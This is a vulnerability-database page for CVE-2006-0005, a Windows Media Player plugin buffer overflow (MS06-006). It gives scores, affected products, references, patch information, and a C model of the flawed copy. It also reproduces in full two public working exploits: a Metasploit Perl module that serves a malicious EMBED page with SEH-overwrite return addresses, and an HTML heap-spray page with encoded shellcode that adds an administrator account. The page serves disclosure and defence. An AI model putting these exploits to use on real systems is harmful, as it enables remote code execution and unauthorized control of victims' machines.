CVE-2006-0005
CVSS 9.3
Published: 2006-02-14 14:06:00
Revised: 2011-03-07 21:29:09

[Original] Buffer overflow in the plug-in for Microsoft Windows Media Player (WMP) 9 and 10, when used in browsers other than Internet Explorer and set as the default application to handle media files, allows remote attackers to execute arbitrary code via HTML with an EMBED element containing a long src attribute.


[CNNVD] Microsoft Windows Media Player Plug-in Buffer Overflow Vulnerability (CNNVD-200602-192)

        Microsoft Windows Media Player is a widely used media player.
        Windows Media Player (WMP) can be loaded as a plug-in by popular browsers so that users can play Windows Media file types embedded in web pages.
        The Windows Media Player plug-in contains a buffer overflow; under certain conditions a remote attacker can exploit it to execute arbitrary code on the user's machine. The flaw can be triggered from some non-IE browsers (such as Firefox and Netscape); the CNNVD entry states that IE and Opera are not affected, but note that the Metasploit module and the SecurityFocus entry further down this page both report Opera 8.5 as an exploitable vector as well. If one of these browsers loads a malicious HTML page whose EMBED element carries an over-long src attribute and the WMP plug-in is launched, the SEH record on the stack is overwritten, leading to arbitrary code execution. Specifically, the flaw is in the function at npdsplay.10001040, where the user-supplied string is copied into a stack buffer with a length derived from the source alone and never compared with the destination size:
         1000171A C1E9 02 SHR ECX,2
        >> 1000171D F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
         1000171F 8BC8 MOV ECX,EAX
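The copy pattern in the disassembly above, modelled as an added example (this is not code from the CNNVD entry, the Microsoft bulletin or either exploit on this page). A constructed, simulated stack region stands in for the plugin's frame, with the SEH record placed at the offsets the Metasploit module below writes to (2082 for the next-pointer, 2086 for the handler); the buffer size SRC_BUF_SIZE, the sentinel handler value and the frame layout are assumptions. The unchecked copy derives its dword count from the attacker-controlled src length alone, so the handler pointer ends up holding the attacker's address; the checked variant bounds the copy by the destination size and rejects the over-long src. A bad-character check for the bytes the module lists as unusable is included so the constraint Murphy describes is visible.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Constructed model for this example, not the plugin's real frame: a simulated
 * stack region with the fixed-size src buffer at offset 0 and the nearest SEH
 * record at the offsets the Metasploit module on this page overwrites
 * (next-pointer at byte 2082, handler pointer at byte 2086).
 * SRC_BUF_SIZE and ORIG_HANDLER are assumptions. */
#define STACK_SIZE      4096
#define SRC_BUF_SIZE    256
#define SEH_NEXT_OFF    2082
#define SEH_HANDLER_OFF 2086
#define ORIG_HANDLER    0xDEADBEEFu   /* sentinel standing in for the legitimate handler */
#define SRC_LEN         4000          /* the module's "C" x 4000 pattern length */

struct sim_stack { unsigned char mem[STACK_SIZE]; };

static void write_le32(unsigned char *p, uint32_t v) {
    p[0] = (unsigned char)(v & 0xff);         p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff); p[3] = (unsigned char)((v >> 24) & 0xff);
}

static uint32_t read_le32(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void stack_init(struct sim_stack *st) {
    memset(st->mem, 0, sizeof st->mem);
    write_le32(st->mem + SEH_HANDLER_OFF, ORIG_HANDLER);
}

/* Vulnerable pattern, modelling "SHR ECX,2 / REP MOVSD" at npdsplay 1000171D:
 * the dword count comes from the source length only; nothing compares it with
 * the destination size. The clamp keeps this demo memory-safe; the real code
 * has no such check, which is the bug. */
static void copy_src_unchecked(struct sim_stack *st, const unsigned char *src, size_t len) {
    size_t dwords = len / 4;
    if (dwords > STACK_SIZE / 4) dwords = STACK_SIZE / 4;
    memcpy(st->mem, src, dwords * 4);
}

/* Hardened form: the destination size bounds the copy, and an over-long src is
 * rejected outright rather than silently truncated. */
static int copy_src_checked(struct sim_stack *st, const unsigned char *src, size_t len) {
    if (len >= SRC_BUF_SIZE) return -1;
    memcpy(st->mem, src, len);
    st->mem[len] = 0;
    return 0;
}

/* Bytes the Metasploit module lists as unusable in src: NUL, '"' and any value
 * with the sign bit set (Murphy's notes say the browser replaces those). */
int src_has_bad_chars(const unsigned char *src, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (src[i] == 0x00 || src[i] == 0x22 || src[i] >= 0x80) return 1;
    return 0;
}

/* The module's src layout: 'C' filler, "ABC=" in the SEH next-pointer slot
 * (three INCs and a CMP EAX,imm32 whose immediate swallows the handler
 * address, so execution falls through past it), then the handler address. */
size_t build_src(unsigned char *out, size_t cap, uint32_t handler_addr) {
    if (cap < SRC_LEN) return 0;
    memset(out, 'C', SRC_LEN);
    memcpy(out + SEH_NEXT_OFF, "ABC=", 4);
    write_le32(out + SEH_HANDLER_OFF, handler_addr);
    return SRC_LEN;
}

/* Handler pointer left in the SEH record after the unchecked copy. */
uint32_t handler_after_unchecked_copy(uint32_t handler_addr) {
    unsigned char src[SRC_LEN];
    struct sim_stack st;
    size_t len = build_src(src, sizeof src, handler_addr);
    stack_init(&st);
    copy_src_unchecked(&st, src, len);
    return read_le32(st.mem + SEH_HANDLER_OFF);
}

/* Same input through the checked copy: returns the copy status and leaves the
 * resulting handler pointer in *handler_out. */
int checked_copy_status(uint32_t handler_addr, uint32_t *handler_out) {
    unsigned char src[SRC_LEN];
    struct sim_stack st;
    size_t len = build_src(src, sizeof src, handler_addr);
    stack_init(&st);
    int rc = copy_src_checked(&st, src, len);
    *handler_out = read_le32(st.mem + SEH_HANDLER_OFF);
    return rc;
}

int main(void) {
    uint32_t h = 0;
    printf("unchecked copy: SEH handler = 0x%08x\n", handler_after_unchecked_copy(0x07694b1eu));
    int rc = checked_copy_status(0x07694b1eu, &h);
    printf("checked copy:   rc = %d, SEH handler = 0x%08x\n", rc, h);
    return 0;
}
```

The addresses 0x07694b1e and 0x4b5d5c74 used in the assertions are the wmp.dll return addresses the module selects for NT/2000 and XP SP2; every byte of each is below 0x80, which is why the module can use them despite the sanitisation.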

- CVSS (base score)

CVSS score: 9.3 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in total shutdown of the system]
Access complexity: MEDIUM [some access conditions must be met to exploit]
Access vector: NETWORK [attacker needs neither intranet nor local access]
Authentication: NONE [no authentication required to exploit]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_xp:::x64  Microsoft Windows XP 64-bit
cpe:/o:microsoft:windows_server_2003:web_edition_sp1
cpe:/o:microsoft:windows-nt:datacenter_server:sp3
cpe:/o:microsoft:windows_2000_advanced_server:sp3
cpe:/o:microsoft:windows_2000::sp3:pro
cpe:/o:microsoft:windows_xp::sp2:pro
cpe:/o:microsoft:windows_2000_advanced_server:sp1
cpe:/o:microsoft:windows_2003_server:datacenter_edition
cpe:/o:microsoft:windows_2003_server:enterprise_edition
cpe:/o:microsoft:windows_server_2000:sp1
cpe:/o:microsoft:windows_2000::sp2:pro
cpe:/o:microsoft:windows_server_2003:standard_sp1
cpe:/o:microsoft:windows_xp:::pro
cpe:/o:microsoft:windows_2003_server:standard_64-bit
cpe:/o:microsoft:windows_2003_server:standard
cpe:/o:microsoft:windows_2000::sp4:server  Microsoft Windows 2000 Server SP4
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows-nt:xp_tablet_pc:sp1
cpe:/o:microsoft:windows_server_2003:enterprise_sp1
cpe:/o:microsoft:windows_2000::sp4:pro
cpe:/o:microsoft:windows_server_2000:none
cpe:/o:microsoft:windows_2003_server:datacenter_edition_64-bit
cpe:/o:microsoft:windows_server_2003:datacenter_sp1
cpe:/o:microsoft:windows-nt:xp:sp2:home
cpe:/o:microsoft:windows-nt:datacenter_server:sp2
cpe:/o:microsoft:windows_xp:::media_center
cpe:/o:microsoft:windows-nt:xp
cpe:/o:microsoft:windows-nt:xp_tablet_pc:sp2
cpe:/o:microsoft:windows-nt:datacenter_server:sp4
cpe:/o:microsoft:windows_server_2000:sp3
cpe:/o:microsoft:windows_xp:::home
cpe:/o:microsoft:windows-nt:2000
cpe:/o:microsoft:windows_xp::sp1:pro
cpe:/o:microsoft:windows_2000_advanced_server:sp2
cpe:/o:microsoft:windows_2000_advanced_server
cpe:/o:microsoft:windows_xp::sp2:media_center  Microsoft Windows XP SP2 Media Center
cpe:/o:microsoft:windows_2003_server:enterprise_edition_64-bit
cpe:/o:microsoft:windows_2000::sp1:pro
cpe:/o:microsoft:windows-nt:xp_tablet_pc
cpe:/o:microsoft:windows-nt:datacenter_server:sp1
cpe:/o:microsoft:windows_2000_advanced_server:sp4
cpe:/o:microsoft:windows_2003_server:web_edition
cpe:/o:microsoft:windows-nt:datacenter_server
cpe:/o:microsoft:windows_xp::sp1:media_center  Microsoft Windows XP SP1 Media Center
cpe:/o:microsoft:windows_server_2000:sp2

- OVAL (technical details for detection)

oval:org.mitre.oval:def:1559  Windows Media Player Plug-in EMBED Vulnerability
oval:gov.nist.fdcc.patch:def:293  MS06-006: Vulnerability in Windows Media Player Plug-in with Non-Microsoft Internet Browsers Could Allow Remote Code Execution (911564)
oval:gov.nist.USGCB.patch:def:293  MS06-006: Vulnerability in Windows Media Player Plug-in with Non-Microsoft Internet Browsers Could Allow Remote Code Execution (911564)
*OVAL definitions describe in detail how to detect this vulnerability; see the referenced OVAL definitions for more technical detail on detection.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0005
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0005
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-192
(official data source) CNNVD

- Other links and resources

http://www.us-cert.gov/cas/techalerts/TA06-045A.html
(UNKNOWN)  CERT  TA06-045A
http://www.kb.cert.org/vuls/id/692060
(UNKNOWN)  CERT-VN  VU#692060
http://xforce.iss.net/xforce/xfdb/24493
(UNKNOWN)  XF  win-mediaplayer-plugin-embed-bo(24493)
http://www.vupen.com/english/advisories/2006/0575
(UNKNOWN)  VUPEN  ADV-2006-0575
http://www.securityfocus.com/bid/16644
(UNKNOWN)  BID  16644
http://www.microsoft.com/technet/security/bulletin/ms06-006.mspx
(UNKNOWN)  MS  MS06-006
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=393
(UNKNOWN)  IDEFENSE  20060214 Microsoft Windows Media Player Plugin Buffer Overflow Vulnerability
http://securitytracker.com/id?1015628
(UNKNOWN)  SECTRACK  1015628
http://secunia.com/advisories/18852
(VENDOR_ADVISORY)  SECUNIA  18852

- Vulnerability information (CNNVD)

Microsoft Windows Media Player Plug-in Buffer Overflow Vulnerability
Severity: High  Type: Buffer overflow
Published: 2006-02-14 00:00:00  Updated: 2006-02-21 00:00:00
Attack vector: Remote

- Advisories and patches

        The vendor has released an update that fixes this issue; download link:
        http://www.microsoft.com/technet/security/Bulletin/MS06-006.mspx

- Vulnerability information (EDB 1504)

MS Windows Media Player 9 Plugin Overflow Exploit (MS06-006) (meta) (EDBID:1504)
Platform: windows  Type: remote
Published: 2006-02-17  Verified
Author: H D Moore
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::wmp_plugin_ms06_006;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;

 my $advanced =
  {
	'Gzip'       => [1, 'Enable gzip content encoding'],
	'Chunked'    => [1, 'Enable chunked transfer encoding'],
  };

my $info =
  {
	'Name'           => 'Windows Media Player Plugin MS06-006 Overflow',
	'Version'        => '$Revision: 1.1 $',
	'Authors'        =>
	  [
		'H D Moore <hdm [at] metasploit.com>',
	  ],

	'Description'    =>
	  Pex::Text::Freeform(qq{
		This module exploits a vulnerability in the Windows Media Player plugin
		for non-Microsoft web browsers. This module has been tested with Windows
		Media Player 9 on Windows 2000 SP4, Windows XP SP2, and Windows 2003 SP0
		(Firefox 1.5 and Opera 8.5).
}),

	'Arch'           => [ 'x86' ],
	'OS'             => [ 'win32', 'winxp', 'win2003' ],
	'Priv'           => 0,

	'AutoOpts'       => { 'EXITFUNC' => 'process', 'GETPCTYPE' => 'ecx' },
	'UserOpts'       =>
	  {
		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
	  	'REALHOST' => [ 0, 'HOST', 'External address to use for redirects (NAT)' ],
	  },

	'Payload'        =>
	  {
		# give some stack space, align esp
		'Space'     => 1024,
		'BadChars'  => "\x00\x22".join('', map { $_=chr($_) } (0x80 .. 0xff)),
		'MinNops'   => 0,
		'MaxNops'   => 0,
	  },
	'Refs'           =>
	  [
	  	['CVE', '2006-0005'],
	  	['OSVDB', '23132'],
		['MSB', 'MS06-006'],
		['BID', '16644'],  # the published module cited 15130, an unrelated BID; 16644 is this issue
	  ],

	'DefaultTarget'  => 0,
	'Targets'        =>
	  [
		[ 'Automatic - WMP 9.0', 0x07694b1e ]
	  ],

	'Keys'           => [ 'wmp' ],

	'DisclosureDate' => 'Feb 14 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit
{
	my $self = shift;
	my $server = IO::Socket::INET->new(
		LocalHost => $self->GetVar('HTTPHOST'),
		LocalPort => $self->GetVar('HTTPPORT'),
		ReuseAddr => 1,
		Listen    => 1,
		Proto     => 'tcp'
	  );
	my $client;

	# Did the listener create fail?
	if (not defined($server)) {
		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
		return;
	}

	my $httphost = $self->GetVar('HTTPHOST');
	$httphost = Pex::Utils::SourceIP('1.2.3.4') if $httphost eq '0.0.0.0';

	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");

	while (defined($client = $server->accept())) {
		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
	}

	return;
}

sub HandleHttpClient
{
	my $self = shift;
	my $fd   = shift;

	# Set the remote host information
	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
		

	# Read the HTTP command
	my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
	my $agent;
	
	# Read in the HTTP headers
	while ((my $line = $fd->RecvLine(10))) {
		
		$line =~ s/^\s+|\s+$//g;
		
		my ($var, $val) = split(/\:/, $line, 2);

		# Break out if we reach the end of the headers
		last if (not defined($var) or not defined($val));

		$agent = $val if $var =~ /User-Agent/i;
	}


	my $addr;

	##
	# XXX Does not detect Windows SP levels or WMP version :-(
	##

	# Windows NT and Windows 2000 systems
	if ($agent =~ /Windows NT [45]\.0/) {
		$self->PrintLine("[*] Targetting WMP v9 on NT/2000...");
		$addr = 0x07694b1e; # wmp.dll v9.00.00.2980
	}

	# Windows XP SP2
	if ($agent =~ /Windows NT 5\.1/) {
		$self->PrintLine("[*] Targetting WMP v9 on XP SP2...");	
		$addr = 0x4b5d5c74; # wmp.dll v9.00.00.3250
	}
	
	# Windows 2003 SP0
	if ($agent =~ /Windows NT 5\.2/) {
		$self->PrintLine("[*] Targetting WMP v9 on 2003 SP0...");	
		$addr = 0x585a6052; # wmp.dll v9.00.00.2991
	}	
	

	my $target    = $self->Targets->[$self->GetVar('TARGET')];
	my $shellcode = $self->GetVar('EncodedPayload')->Payload;
	my $pattern   = "C" x 4000;

	$addr = $target->[1] if ! $addr;
	
	# We can't use SEH getpc from inside a SEH handler on XP SP2 >:(
	# So we do it like a drunk ninja.
	my $getpc = 
		"\x58\x58\x58".         # pop eax, pop eax, pop eax
		"\x05\x18\x29\x29\x29". # add eax,0x29292917
		"\x2d\x01\x29\x29\x29". # sub eax,0x29292901
		"\x50\x59";             # push eax, pop ecx

	substr($pattern, 2082, 4, "ABC=");       # inc, inc, inc, cmp eax, [ptr]	
	substr($pattern, 2086, 4, pack('V', $addr));
	substr($pattern, 2090, length($getpc), $getpc);
	substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode);

	my $content   = "<html><body><embed type=\"application/x-mplayer2\" src=\"$pattern.wmv\"></body></html>";

	$self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload...");

	$fd->Send($self->BuildResponse($content));

	# Prevents IE from throwing an error in some cases
	select(undef, undef, undef, 0.1);

	$fd->Close();
}

sub RandomHeaders {
	my $self = shift;
	my $head = '';

	while (length($head) < 3072) {
		$head .= "X-" .
		  Pex::Text::AlphaNumText(int(rand(30) + 5)) . ': ' .
		  Pex::Text::AlphaNumText(int(rand(256) + 5))  ."\r\n";
	}
	return $head;
}


sub BuildResponse {
	my ($self, $content) = @_;

	my $response =
	  "HTTP/1.1 200 OK\r\n" .
	  $self->RandomHeaders() .
	  "Content-Type: text/html\r\n";

	if ($self->GetVar('Gzip')) {
		$response .= "Content-Encoding: gzip\r\n";
		$content = $self->Gzip($content);
	}
	if ($self->GetVar('Chunked')) {
		$response .= "Transfer-Encoding: chunked\r\n";
		$content = $self->Chunk($content);
	} else {
		$response .= 'Content-Length: ' . length($content) . "\r\n" .
		  "Connection: close\r\n";
	}

	$response .= "\r\n" . $content;

	return $response;
}

sub Chunk {
	my ($self, $content) = @_;

	my $chunked;
	while (length($content)) {
		my $chunk = substr($content, 0, int(rand(10) + 1), '');
		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
	}
	$chunked .= "0\r\n\r\n";

	return $chunked;
}

sub Gzip {
	my $self = shift;
	my $data = shift;
	my $comp = int(rand(5))+5;

	my($wtr, $rdr, $err);

	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
	print $wtr $data;
	close ($wtr);
	local $/;

	return (<$rdr>);
}

1;

# milw0rm.com [2006-02-17]

- Vulnerability information (EDB 1505)

MS Windows Media Player 10 Plugin Overflow Exploit (MS06-006) (EDBID:1505)
Platform: windows  Type: remote
Published: 2006-02-17  Verified
Author: Matthew Murphy
<HTML>
<HEAD>
<TITLE>WMP Plugin EMBED Exploit</TITLE>
<SCRIPT>
// Windows Media Player Plug-In EMBED Overflow Universal Exploit (MS06-006)
// By Matthew Murphy (mattmurphy@kc.rr.com)
//
// DISCLAIMER:
//
// This exploit code is intended only as a demonstration tool for
// educational or testing purposes. It is not intended to be used for any
// unauthorized or illicit purpose. Any testing done with this tool must
// be limited to systems that you own or are explicitly authorized to
// test.
//
// By utilizing or possessing this code, you assume any and all
// responsibility for damage that results. The author will not be held
// responsible, under any circumstances, for damage that arises from your
// possession or use of this code.
//
// Tested: 
// Firefox 1.5.0.1
// Windows Media Player 10
// Windows XP SP2 (US)
//
// The Windows Media Player plug-in for non-Microsoft browsers (Firefox,
// Opera, etc.) suffers from an exploitable overflow in its handling of
// EMBED tags. Specifically, a very long SRC property on such a tag can
// lead to an overflow that will corrupt a structured exception handling
// frame.
//
// The SEH frame is the vector of control that I exploit. Fortunately,
// DEP is turned off for non-Microsoft code, so there's no issue there.
// That's really a shame, because such a move would've made an already
// difficult exploit much harder.
//
// One of the reasons the exploit is tough is because the overrun buffer
// (the SRC attribute) is seriously mangled before it is handled by the
// plug-in. In particular, any character with the sign bit set (> 0x7F)
// is replaced.
//
// We could do as the creative wizards like HD Moore suggest and use an
// alphanumeric payload with some cute SEH tricks. Let me rephrase:
// YOU could do as the creative wizards suggest. Meanwhile, I'm perfectly 
// content to throw my code in another buffer and get around all the silly 
// alpha-numeric sanitation. Sure beats devoting hours to beating it
// with fancy shellcode, all for a PoC I may never release.
//
// Instead, I shamelessly ripped a page from Skylined's book and borrowed
// (and cleaned up) the heap spraying technique. My heap-spray is a lot
// less precise, because the memory layout is a lot more variable. In
// my experience, it took a _HUGE_ block allocation to get the heap I 
// wanted to jump to into a reliably-placed location. Hence the atrocity
// of the 16MB of noops below.
//
// Aside from the character restrictions, this is a standard stack-based
// overflow. I simply smash the SEH frame with a pointer to my HUGE heap
// block, which consists of a bunch of 0x41 characters. An INC ECX is a
// functional noop -- so the box takes the slide down the heap into the
// shellcode. The shellcode is a standard Win32 "add administrator" 
// payload from Metasploit.
//
// This exploit is a lot of ripping, cleaning and re-implementation, but
// that just goes to show how easy it is to write. So... how about that 
// 'Important' rating? A bit perplexing to rate a "click-and-own" as an
// Important... or is it just because nobody would *DARE* run one of those
// "Non-Microsoft" browsers on Windows? :-)

// Spray the heap
var spray = unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
do {
spray += spray;
} while (spray.length < 0x1000000);

// If this is successful, you can login as a local admin:
//
// User: wmp0wn3d
// Pass: password

spray += unescape(
"%uc933%ue983%ud9c9%ud9ee%u2474%u5bf4%u7381%u9713"+
"%u798c%u839b%ufceb%uf4e2%u646b%u9b3d%u8c97%udef2"+
"%u07ab%u9e05%u8def%u1096%u94d8%uc4f2%u8db7%ud292"+
"%ub81c%u9af2%ubd79%u02b9%u083b%uefb9%u4d90%u96b3"+
"%u4e96%u6f92%ud8ac%u9f5d%u69e2%uc4f2%u8db3%ufd92"+
"%u801c%u1032%u90c8%u7078%u901c%u9af2%u057c%ubf25"+
"%u4f93%u5b48%u07f3%uab39%u4c12%u9701%ucc1c%u1075"+
"%u90e7%u10d4%u84ff%u9292%u0c1c%u9bc9%u8c97%uf3f2"+
"%ud3ab%u6d48%udaf7%u63f0%u4c14%ucb02%u7cff%u9ff3"+
"%ue4c8%u65e1%u821d%u642e%uef70%uff14%ue9b9%ufe01"+
"%ua3b7%ubb1a%ue9f9%ubb0d%uffe2%ue91c%ufbb7%ueb14"+
"%ufba7%ua817%uacf3%ufa09%uffe4%uf40e%ue8e5%ub459"+
"%uc8d6%ubb3d%uaab1%uf559%uf8f2%uf759%ueff8%uf718"+
"%ufef0%uee16%uace7%uff38%ue5fa%uf217%uf8e4%ufa0b"+
"%ue3e3%ue80b%ufbb7%ueb14%ufba7%ua817%uacf3%uda56"+
"%uc8d3%u9b79"
);
</SCRIPT>
</HEAD>
<BODY>
<EMBED SRC="--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv"></EMBED>
</BODY>
</HTML>

# milw0rm.com [2006-02-17]

- Vulnerability information (OSVDB)

23132
Microsoft Windows Media Player Plug-in Malformed EMBED Element Arbitrary Code Execution
Location: Remote / Network Access, Context Dependent
Impact: Loss of Integrity  Solution: Workaround, Patch / RCS
Exploit: Public  Disclosure: Vendor Verified, Coordinated Disclosure

- Vulnerability description

- Timeline

Disclosure date: 2006-02-14  Discovery date: Unknown
Exploit publish date: 2006-02-17  Solution date: 2006-02-14

- Solution

Microsoft has released a patch to address this vulnerability. Additionally, it is possible to temporarily work around the flaw by implementing the following workaround: do not set Windows Media Player as the default application to launch media files.

- References

- Credit

Unknown or Incomplete

- Vulnerability information (SecurityFocus BID)

Microsoft Windows Media Player Plugin Buffer Overflow Vulnerability
Class: Boundary Condition Error  BID: 16644
Remote: Yes  Local: No
Published: 2006-02-14 12:00:00  Updated: 2007-05-15 08:48:00
John Cobb of iDEFENSE is credited with the discovery of this vulnerability. This issue was disclosed in the referenced vendor advisory.

- Affected product versions

Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 0
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server

- Discussion

The Microsoft Windows Media Player plugin for non-Microsoft browsers is prone to a buffer-overflow vulnerability. The application fails to do proper boundary checks on user-supplied data before using it in a finite-sized buffer.

An attacker can exploit this issue to execute arbitrary code on the victim user's computer in the context of the victim user. This may facilitate a compromise of the affected computer.

This issue is exploitable only through non-Microsoft browsers that have the Media Player plugin installed. Possible browsers include Firefox 0.9 and later and Netscape 8; other browsers with the plugin installed may also be affected.

- Exploit

UPDATE (May 15, 2007): This issue is being exploited by the MPack hacker tool. Please see the references for more information.

NOTE: Mozilla Firefox and Opera Browser (and possibly other browsers) are a valid attack vector for this issue.

The following exploits are available:

- Solution

Microsoft has released security advisory MS06-006 with updates to address this issue.

Updates are available for:
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows XP Home SP2
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home
Microsoft Windows XP Home SP1
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Media Center Edition
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows XP Professional SP2
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows XP Professional
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows 2000 Professional SP4
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional SP1
